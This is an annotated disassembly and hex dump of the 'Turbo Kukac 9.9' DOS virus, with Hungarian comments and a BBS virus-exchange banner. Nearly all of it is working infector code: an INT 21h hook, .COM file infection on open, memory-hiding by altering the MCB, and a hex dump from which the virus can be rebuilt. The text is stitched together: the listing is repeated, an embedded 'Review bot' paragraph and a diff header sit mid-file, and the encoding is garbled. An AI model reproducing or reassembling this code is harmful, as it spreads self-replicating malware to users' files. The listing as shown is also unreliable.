28F8:01E9 57 PUSH DI
28F8:01EA 56 PUSH SI
;File kiterjeszts ellen”rzse
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
28F8:01ED 8CDE MOV SI,DS
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
; tvtele!)
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
28F8:01F6 FC CLD ;el”re
28F8:01F7 F2 REPNZ
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
;resse
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts
;kezdet+1 pozici˘ra mu-
;tat
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
28F8:01FF 26 ES:
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ?
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
;file
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
28F8:020A 26 ES:
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
;File nyit sa
28F8:0213 B43D MOV AH,3D ;file nyit s
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
28F8:021A 7303 JNB 021F ;ha nincs hiba
28F8:021C E98200 JMP 02A1 ;hiba esetn ugr s az
;eredeti INT 21h-ra
28F8:021F 8BD8 MOV BX,AX ;file kezel”
;File mret ellen”rzs
28F8:0221 B90000 MOV CX,0000
28F8:0224 BA0000 MOV DX,0000
28F8:0227 B002 MOV AL,02 ;file vgre
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
28F8:022E 3D00FE CMP AX,FE00
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
;65024 byte-n l
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
;Fert”zend” file eredeti 4 byte j nak
;beolvas sa
28F8:0236 2E CS:
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
28F8:023C B000 MOV AL,00 ;file elejre
28F8:023E B90000 MOV CX,0000
28F8:0241 BA0000 MOV DX,0000
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
28F8:0249 B90400 MOV CX,0004 ;4 byte
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
28F8:024F 8CCF MOV DI,CS
28F8:0251 8EDF MOV DS,DI ;DS=CS
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
28F8:0256 B005 MOV AL,05
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
;INT 21h -ra
;Fert”zend” file-ba a virusra
;mutat˘ JMP+op. kiˇr sa (4 byte)
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
28F8:0260 B000 MOV AL,00 ;file elejre
28F8:0262 B90000 MOV CX,0000
28F8:0265 8BD1 MOV DX,CX
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
28F8:026C 2E CS:
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
28F8:0270 B005 MOV AL,05
28F8:0272 2E CS:
28F8:0273 A2C002 MOV [02C0],AL
28F8:0276 B90400 MOV CX,0004 ;4 byte
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
28F8:027C 8CC8 MOV AX,CS
28F8:027E 8ED8 MOV DS,AX
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
;Program megfert”zse 0200h byte kiˇr sa
;azaz a virus m”gm sol sa
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
28F8:0287 B002 MOV AL,02 ;file vgre
28F8:0289 B90000 MOV CX,0000
28F8:028C 8BD1 MOV DX,CX
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
28F8:029C B43E MOV AH,3E ;file z r sa
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
28F8:02A1 5E POP SI
28F8:02A2 5F POP DI
28F8:02A3 5A POP DX
28F8:02A4 59 POP CX
28F8:02A5 5B POP BX
28F8:02A6 58 POP AX
28F8:02A7 07 POP ES
28F8:02A8 1F POP DS
28F8:02A9 90 NOP
28F8:02AA 2E CS:
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
28F8:02AF CF IRET
;Eredeti INT 21h hiv sa
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
;visszamenti a flag-eket
28F8:02B1 2E CS:
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
28F8:02B6 C3 RET
28F8:02B7 16 PUSH SS
28F8:02B8 130C ADC CX,[SI]
28F8:02BA 0202 ADD AL,[BP+SI]
28F8:02BC 00E9 ADD CL,CH
28F8:02BE 06 PUSH ES
28F8:02BF 06 PUSH ES
28F8:02C0 05E906 ADD AX,06E9
28F8:02C3 0405 ADD AL,05
28F8:02C5 0100 ADD [BX+SI],AX
28F8:02C7 0000 ADD [BX+SI],AL
28F8:02C9 0001 ADD [BX+DI],AL
28F8:02CB F0 LOCK
28F8:02CC 0901 OR [BX+DI],AX
28F8:02CE 54 PUSH SP
28F8:02CF 7572 JNZ 0343
28F8:02D1 62 DB 62
28F8:02D2 6F DB 6F
28F8:02D3 204B75 AND [BP+DI+75],CL
28F8:02D6 6B DB 6B
28F8:02D7 61 DB 61
28F8:02D8 63 DB 63
28F8:02D9 2039 AND [BX+DI],BH
28F8:02DB 2E CS:
28F8:02DC 3920 CMP [BX+SI],SP
28F8:02DE 2020 AND [BX+SI],AH
28F8:02E0 2020 AND [BX+SI],AH
28F8:02E2 2024 AND [SI],AH
28F8:02E4 0000 ADD [BX+SI],AL
28F8:02FC 0000 ADD [BX+SI],AL
28F8:02FE FA CLI
28F8:02FF 00C7 ADD BH,AL
Megjegyzs:
Nagyon primitˇv virus, de megvan a maga zsenialit sa, kt legyet
<EFBFBD>t egy csap sra, pl COPY parancs esetn megnyit egy com file-t,s
ha a virus a mem˘ri ban van, akkor mg a m soland˘ file-t megfer-
tzi, s a COPY m r a fertztt file-t m solja! Nem igaz n k r-
tkony vˇrus, puszt n minden<EFBFBD>tt ott akar lenni, s nehezˇteni a
felhaszn l˘(k) munk j t! Mrete nagyon kicsi, mindssze 512 byte!
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
ban fellelhet ellenrzsek, gondolok itt arra, hogy ha megtrtnik
egy file-ba (hoz) val˘ kiˇr s nem ellenrzi a program hogy val˘ban
kiˇrta-e azt az X byte-ot. Tov bb  mikor rezidess (nem {hivatalo-
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
lv RAM tetejnek a paragrafus cˇmtt a saj t maga  lltal lefog-
lalt mrettel (kivon s!), mint PL. a Yankee Doodle! A Yankee mg
azt is megnzi, hogy amit meg akar fertzni az az utols˘ mem˘.
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
odaadja a teljes szabad mem˘ri t, ami van...
DUMP:
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
;Kiˇrand˘ sz”veg kezdete
28F8:02C0 54 75 Tu
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
28F8:02E0 20 20 20 24 $
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
28F8:0300 C7 .
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
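Review bot: Several annotations in this listing contradict the instruction they sit on, which will mislead anyone checking it against the DUMP: the comments `MOV [02B7],BX ;INT 05h offset (rgi)` and `MOV [02B9],BX ;INT 05h segment (rgi)` follow an `AH=35h/AL=21h` call and store the saved INT 21h vector (the same `[02B7]` the tail-end `JMP FAR [02B7]` uses), not INT 05h, and the comment under `JMP FAR [02C5]` names offset `01c6` while the code loads `016C` two lines earlier. The DUMP block prints the `02C0` and `02E0` rows twice because it was hand-split around the `Turbo Kukac 9.9` string; a one-line comment such as `;DUMP re-segmented by hand around the message text, so rows 02C0/02E0 overlap` would stop readers from taking it for two different images. The same listing is added a second time by the next file section (also `@ -0,0 +1,426 @@`), differing only in the code-page rendering of the Hungarian comments, so one copy should be dropped or the two marked as duplicates. From an analyst's side, the in-band infection marker (the `05` byte tested at `CMP AL,[02C4] ;utols˘ byte=5 ?` and emitted via `MOV [02C0],AL` as the fourth byte of the written header) and the `CMP AX,FE00` size cut-off are the first things a reader needs; a short English header stating them above the listing would make the annotations usable without reading Hungarian.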

@ -0,0 +1,426 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
TURBO KUKAC v9.9 virus unassembled list:
`90.07.21.
Magyar zat: K”v ri L szl˘
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be
28F8:0103 90 NOP ;ez lesz a b zis offset
28F8:0104 5E POP SI
28F8:0105 50 PUSH AX
28F8:0106 51 PUSH CX
28F8:0107 B021 MOV AL,21
28F8:0109 B435 MOV AH,35
28F8:010B CD21 INT 21 ;INT 21h cˇmnek lekr-
;dezse
28F8:010D 8CC0 MOV AX,ES
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
28F8:0112 7224 JB 0138 ;nincs!
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
;(3 byte hosszu a JMP
;+ az operandusa!)
28F8:0117 BAC102 MOV DX,02C1
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
;(COM file saj toss ga!)
28F8:011E 03F2 ADD SI,DX
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
;dus fele
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
28F8:012D 8CD8 MOV AX,DS
28F8:012F 8EC0 MOV ES,AX ;ES=DS
28F8:0131 59 POP CX
28F8:0132 58 POP AX
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
;HAJTŹSA
;HA M<>G NINCS A MEM˘RIŹBAN
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
28F8:013D A10300 MOV AX,[0003] ;DOS  lltal a programnak
;foglalt mem˘riablokk
;hossza
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
;bel”le (41*16 byte)
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
; lltal l tott teljes
;mem˘ria nagys ga a prg.
;kilpse ut n (41*16
;byte-tal) kevesebb lesz
;Hasonl˘an csin lja ezt
;a YANKEE DOODLE is, s
;ezzel azt ri el, hogy
;semmilyen
;System Storage Map
;programmal nem mutat-
;hat˘ ki a virus jele-
;lte a mem˘ri ban!
;A PCTOOLS system info
;kimutatja, azaz csak
;annyit l tni, hogy a
;fizikai RAM mret 640K
;s a DOS  lltal l tott
;az 639k byte! Igy k”-
;vetkeztetni lehet...
28F8:0146 8CC8 MOV AX,CS
28F8:0148 8ED8 MOV DS,AX ;DS=CS
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej-
;nek a paragrafuscˇme
28F8:014D 2D0008 SUB AX,0800
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
28F8:0152 BF0001 MOV DI,0100
28F8:0155 83EE03 SUB SI,+03
28F8:0158 B90002 MOV CX,0200 ;virus hossza
28F8:015B F3 REPZ
28F8:015C A4 MOVSB ;virus m sol sa az Łj
;szegmensbe
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
28F8:0161 B96C01 MOV CX,016C ;belpsi pont
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
;01c6 offset-re
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
28F8:016C 8CC1 MOV CX,ES
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
28F8:0170 26 ES:
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
28F8:0174 B80001 MOV AX,0100
28F8:0177 26 ES:
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
28F8:017B 8CC0 MOV AX,ES
28F8:017D 8ED8 MOV DS,AX
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
;offset-je
28F8:0182 B005 MOV AL,05
28F8:0184 B425 MOV AH,25
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
28F8:0188 B435 MOV AH,35
28F8:018A B021 MOV AL,21
28F8:018C CD21 INT 21 ;INT 21h cˇm lekrdez-
;se
28F8:018E 2E CS:
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi)
28F8:0193 8CC3 MOV BX,ES
28F8:0195 2E CS:
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi)
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
28F8:019D 8BD0 MOV DX,AX
28F8:019F 8BC1 MOV AX,CX
28F8:01A1 8ED8 MOV DS,AX
28F8:01A3 B021 MOV AL,21
28F8:01A5 B425 MOV AH,25
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
28F8:01B4 8ED8 MOV DS,AX
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
28F8:01BA 890E0201 MOV [0102],CX ;s operandusa
28F8:01BE 8EC0 MOV ES,AX
28F8:01C0 59 POP CX
28F8:01C1 58 POP AX
28F8:01C2 2E CS:
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
;TŹSA!
;Łj INT 05 - HARD COPY rutin
28F8:01C7 90 NOP
28F8:01C8 50 PUSH AX
28F8:01C9 1E PUSH DS
28F8:01CA 52 PUSH DX
28F8:01CB 8CC8 MOV AX,CS
28F8:01CD 8ED8 MOV DS,AX
;V<>GTELEN CIKLUS!
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
;Turbo Kukac v9.9
28F8:01D2 B409 MOV AH,09 ;print string
28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hiv sa
28F8:01D7 EBF6 JMP 01CF ;Łjra!
;Łj INT 21h rutin
28F8:01D9 90 NOP
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
28F8:01DD 7403 JZ 01E2 ;igen
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
;INT 21h-ra
28F8:01E2 90 NOP
28F8:01E3 1E PUSH DS
28F8:01E4 06 PUSH ES
28F8:01E5 50 PUSH AX
28F8:01E6 53 PUSH BX
28F8:01E7 51 PUSH CX
28F8:01E8 52 PUSH DX
28F8:01E9 57 PUSH DI
28F8:01EA 56 PUSH SI
;File kiterjeszts ellen”rzse
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
28F8:01ED 8CDE MOV SI,DS
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
; tvtele!)
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
28F8:01F6 FC CLD ;el”re
28F8:01F7 F2 REPNZ
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
;resse
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts
;kezdet+1 pozici˘ra mu-
;tat
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
28F8:01FF 26 ES:
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ?
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
;file
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
28F8:020A 26 ES:
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
;ti INT 21h-ra
;File nyit sa
28F8:0213 B43D MOV AH,3D ;file nyit s
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
28F8:021A 7303 JNB 021F ;ha nincs hiba
28F8:021C E98200 JMP 02A1 ;hiba esetn ugr s az
;eredeti INT 21h-ra
28F8:021F 8BD8 MOV BX,AX ;file kezel”
;File mret ellen”rzs
28F8:0221 B90000 MOV CX,0000
28F8:0224 BA0000 MOV DX,0000
28F8:0227 B002 MOV AL,02 ;file vgre
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
28F8:022E 3D00FE CMP AX,FE00
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
;65024 byte-n l
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
;Fert”zend” file eredeti 4 byte j nak
;beolvas sa
28F8:0236 2E CS:
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
28F8:023C B000 MOV AL,00 ;file elejre
28F8:023E B90000 MOV CX,0000
28F8:0241 BA0000 MOV DX,0000
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
28F8:0249 B90400 MOV CX,0004 ;4 byte
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
28F8:024F 8CCF MOV DI,CS
28F8:0251 8EDF MOV DS,DI ;DS=CS
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
28F8:0256 B005 MOV AL,05
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
;INT 21h -ra
;Fert”zend” file-ba a virusra
;mutat˘ JMP+op. kiˇr sa (4 byte)
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
28F8:0260 B000 MOV AL,00 ;file elejre
28F8:0262 B90000 MOV CX,0000
28F8:0265 8BD1 MOV DX,CX
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
28F8:026C 2E CS:
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
28F8:0270 B005 MOV AL,05
28F8:0272 2E CS:
28F8:0273 A2C002 MOV [02C0],AL
28F8:0276 B90400 MOV CX,0004 ;4 byte
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
28F8:027C 8CC8 MOV AX,CS
28F8:027E 8ED8 MOV DS,AX
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
;Program megfert”zse 0200h byte kiˇr sa
;azaz a virus m”gm sol sa
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
28F8:0287 B002 MOV AL,02 ;file vgre
28F8:0289 B90000 MOV CX,0000
28F8:028C 8BD1 MOV DX,CX
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
28F8:029C B43E MOV AH,3E ;file z r sa
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
28F8:02A1 5E POP SI
28F8:02A2 5F POP DI
28F8:02A3 5A POP DX
28F8:02A4 59 POP CX
28F8:02A5 5B POP BX
28F8:02A6 58 POP AX
28F8:02A7 07 POP ES
28F8:02A8 1F POP DS
28F8:02A9 90 NOP
28F8:02AA 2E CS:
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
28F8:02AF CF IRET
;Eredeti INT 21h hiv sa
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
;visszamenti a flag-eket
28F8:02B1 2E CS:
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
28F8:02B6 C3 RET
28F8:02B7 16 PUSH SS
28F8:02B8 130C ADC CX,[SI]
28F8:02BA 0202 ADD AL,[BP+SI]
28F8:02BC 00E9 ADD CL,CH
28F8:02BE 06 PUSH ES
28F8:02BF 06 PUSH ES
28F8:02C0 05E906 ADD AX,06E9
28F8:02C3 0405 ADD AL,05
28F8:02C5 0100 ADD [BX+SI],AX
28F8:02C7 0000 ADD [BX+SI],AL
28F8:02C9 0001 ADD [BX+DI],AL
28F8:02CB F0 LOCK
28F8:02CC 0901 OR [BX+DI],AX
28F8:02CE 54 PUSH SP
28F8:02CF 7572 JNZ 0343
28F8:02D1 62 DB 62
28F8:02D2 6F DB 6F
28F8:02D3 204B75 AND [BP+DI+75],CL
28F8:02D6 6B DB 6B
28F8:02D7 61 DB 61
28F8:02D8 63 DB 63
28F8:02D9 2039 AND [BX+DI],BH
28F8:02DB 2E CS:
28F8:02DC 3920 CMP [BX+SI],SP
28F8:02DE 2020 AND [BX+SI],AH
28F8:02E0 2020 AND [BX+SI],AH
28F8:02E2 2024 AND [SI],AH
28F8:02E4 0000 ADD [BX+SI],AL
28F8:02FC 0000 ADD [BX+SI],AL
28F8:02FE FA CLI
28F8:02FF 00C7 ADD BH,AL
Megjegyzs:
Nagyon primitˇv virus, de megvan a maga zsenialit sa, kt legyet
<09>t egy csap sra, pl COPY parancs esetn megnyit egy com file-t,s
ha a virus a mem˘ri ban van, akkor mg a m soland˘ file-t megfer-
t”zi, s a COPY m r a fert”z”tt file-t m solja! Nem igaz n k r-
tkony vˇrus, puszt n minden<65>tt ott akar lenni, s nehezˇteni a
felhaszn l˘(k) munk j t! Mrete nagyon kicsi, mind”ssze 512 byte!
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
ban fellelhet” ellen”rzsek, gondolok itt arra, hogy ha megt”rtnik
egy file-ba (hoz) val˘ kiˇr s nem ellen”rzi a program hogy val˘ban
kiˇrta-e azt az X byte-ot. Tov bb  mikor rezidess (nem {hivatalo-
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
lv” RAM tetejnek a paragrafus cˇmtt a saj t maga  lltal lefog-
lalt mrettel (kivon s!), mint PL. a Yankee Doodle! A Yankee mg
azt is megnzi, hogy amit meg akar fert”zni az az utols˘ mem˘.
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
odaadja a teljes szabad mem˘ri t, ami van...
DUMP:
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
